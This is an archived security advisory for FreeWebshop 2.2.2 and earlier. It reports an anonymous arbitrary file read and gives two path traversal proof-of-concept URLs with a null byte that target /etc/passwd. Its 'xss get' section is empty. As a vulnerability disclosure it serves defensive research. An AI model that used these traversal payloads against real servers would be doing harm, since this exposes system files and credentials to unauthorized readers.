TUCoPS :: Web :: e-commerce, shopping carts :: b06-5659.htm

FreeWebshop <=2.2.2
FreeWebshop <=2.2.2
FreeWebshop <=2.2.2



FreeWebshop <=2.2.2
severity: hight
vendor site: http://www.freewebshop.org/ 

impact: an anonymous user can access anyfile on the remote server

PoC :
http://site.com/?page=../../../../../../../../../../etc/passwd%00 
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00 


xss get :

 


laurent gaffi=E9 & benjamin moss=E9
http://s-a-p.ca/ 
contact: saps.audit@gmail.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH